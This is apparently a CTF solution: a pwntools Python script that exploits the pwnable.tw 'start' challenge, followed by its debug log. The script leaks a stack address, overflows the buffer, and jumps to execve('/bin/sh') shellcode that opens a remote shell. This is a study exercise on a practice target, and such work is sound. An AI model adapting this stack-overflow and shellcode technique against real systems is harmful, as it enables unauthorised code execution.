from pwn import *
def send_payload(payload):
log.info("Send payload = %s" % repr(payload))
r.send(payload)
return
def sendline_payload(payload):
log.info("Send payload = %s" % repr(payload))
r.sendline(payload)
return
binary = './start'
host = 'chall.pwnable.tw'
port = 10000
elf = ELF(binary)
context(arch = 'i386', os = 'linux')
context.log_level = 'debug'
REMOTE = len(sys.argv) >= 2
if REMOTE:
r = remote(host, port)
else:
r = process(binary)
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
print r.recvuntil(':')
rop = ROP(elf)
payload = 'A' * 20
rop.raw(0x08048087)
print rop.dump()
payload += rop.chain()
send_payload(payload)
stack_addr = r.recv(4)
log.info('Stack addr : %x' % unpack(stack_addr))
payload = 'A' * 20
payload += pack(unpack(stack_addr)+20)
payload += shellcode
send_payload(payload)
r.interactive()
python exploit.py r
[*] '/home/vagrant/host-share/pwnabletw/Start/start'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
[+] Opening connection to chall.pwnable.tw on port 10000: Done
[DEBUG] Received 0x14 bytes:
"Let's start the CTF:"
Let's start the CTF:
[*] Loaded cached gadgets for './start'
0x0000: 0x8048087
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08'
[DEBUG] Sent 0x18 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
00000010 41 41 41 41 87 80 04 08 │AAAA│····││
00000018
[DEBUG] Received 0x14 bytes:
00000000 70 0a 89 ff 01 00 00 00 34 0f 89 ff 00 00 00 00 │p···│····│4···│····│
00000010 46 0f 89 ff │F···││
00000014
[*] Stack addr : ff890a70
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x84\n\x89\xff1\xc9\xf7\xe1Qh//shh/bin\x89\xe3\xb0\x0b\xcd\x80'
[DEBUG] Sent 0x2d bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
00000010 41 41 41 41 84 0a 89 ff 31 c9 f7 e1 51 68 2f 2f │AAAA│····│1···│Qh//│
00000020 73 68 68 2f 62 69 6e 89 e3 b0 0b cd 80 │shh/│bin·│····│·│
0000002d
[*] Switching to interactive mode
\x00\x00\x004\x0f\x89\xff\x00\x00\x00\x00F\x0f\x89\xff$